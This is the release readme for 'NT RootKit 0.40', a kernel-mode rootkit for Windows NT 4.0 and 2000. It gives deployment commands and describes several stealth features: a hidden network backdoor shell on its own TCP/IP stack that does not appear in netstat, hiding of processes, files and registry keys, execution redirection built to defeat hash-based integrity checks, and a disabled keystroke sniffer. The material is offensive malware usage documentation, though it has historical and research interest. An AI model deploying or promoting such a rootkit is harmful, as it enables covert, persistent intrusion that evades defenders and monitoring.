NT RootKit

by hoglund

NT RootKit 0.31

NT RootKit 0.40


Alpha build - debug 0.40

This has been tested and known to work under NT 4.0 Server (1381).
This has been tested and known to work under Windows 2000 RC2 (2128).

Note: this debug build of the rootkit generates huge amounts of debug messages.
You can watch these with a tool such as DbgView from www.sysinternals.com (or equivalent).

To test out the rootkit, copy deploy.exe and _root_.sys to a common directory.

To install and start the rootkit, run deploy.exe.

To start and stop the rootkit in realtime, use the following commands:

net start _root_
net stop _root_

Respectively.

NEWS
----

Keyboard sniffing has been disabled for now.
You can comment the line back in DriverEntry() if your daring.
Keyboard sniffing actually works fine - except that it has caused a BSOD
on one of my test machines and I didn't want to release it that way 
until the problem could be debugged.

New features:

Embedded TCP/IP stack (stateless)
---------------------------------

NT ROOTKIT has a stateless TCP/IP stack.
It works by determining the state of the connection based on the data within the incoming packet.
This works fine for all tests we have performed on the local segment.
This has not yet been tested over great distances of Internet.

The ROOTKIT has a hardcoded IP address to which it will respond.
As delivered, this IP address is 10.0.0.166 - if you have a client machine
that is configured with a 10.X address, it should be able to telnet to the rootkit.
Keep in mind that the rootkit is using raw connections to your ethernet so it can do some amazing things.
First you will notice that the target port does not matter. 
You can telnet to any port and it will work. 
Second - you will notice that multiple people can log into the rootkit at once.
The sessions are not kept seperate but testing has shown that it seems to work quite well
as long as two people aren't typing commands at exactly the same time.

NOTE: THIS MEANS THAT ROOTKIT DOES NOT SHOW UP IN NETSTAT

Ideed, why would it?  It's not using the NT stack.

Gotcha: The rootkit IP address has better not conflict with a real machine on your network,
else the two will get into an ARP war - and that is not good. 
Get this: the rootkit needs to use a unique IP address~!


Command Shell
-------------

We have experimented with launching win32 processes from kernel mode.  This has been non-trivial. 
We have demonstrated this working at Blackhat - but the feature is disabled in this build.
It will be added back in for the 044 branch - but there are many kinks still being worked out.

HIDE PROCESSES
--------------

Any process that starts with '_root_' will be hidden.
This feature can be toggled on/off from the k-mode shell.
Just login and type 'hideproc' to toggle.

HIDE FILES AND DIRS
-------------------

Any directory or file that starts with '_root_' will be hidden. 
This feature can be toggled from the k-mode shell.  Just login and type 'hidedir' to toggle.

Processes that are named with a prefix of '_root_' are excempt from these rules.
This means if your running a shell as '_root_cmd.exe' you can still see the hidden stuff.
This means that '_root_taskmgr.exe' can still see hidden processes.


Test EXE redirection:
---------------------

For now, this test is hard coded.  To test, first carry out the following:

Copy 'calc.exe' to C:\
Copy any other executable to C:\ and rename it so that the first 6 characters of the filename are '_root_'. 
CMD.EXE was tested, so it would be ranamed to "C:\_root_cmd.exe".

The rootkit will detect the execution of the filename that starts with '_root_' and redirect it to "C:\calc.exe". 
Try executing the file and you will see that calc.exe gets executed instead.

Now, with the rootkit turned off, open '_root_cmd.exe' (or equivalent) in a hex editor.
Now start the rootkit and open it again. 
Note that the images are exactly the same!  You are looking at the same file. 
Now open calc.exe and verify that it is different. 
As you can see the rootkit does not effect the ability to read a file correctly. 
The rootkit only becomes involved when the file is executed. 
This should fool programs that perform CRC's or Hashes of files.

  
Test Registry Hiding:
---------------------

Any value or key that begins with the 6 letters '_root_' should be hidden
from view. regedit.exe and regedt32.exe were tested.

Additionally, any program that is running that begins with '_root_' will be
exempt from any subterfuge - hence,
if you make a copy of regedit.exe called '_root_regedit.exe' - the new copy
of regedit will be able to see all of the hidden keys!  (neato)

Try starting and stopping the rootkit dynamically and refreshing your view of the registry, also.
You will see that it is working.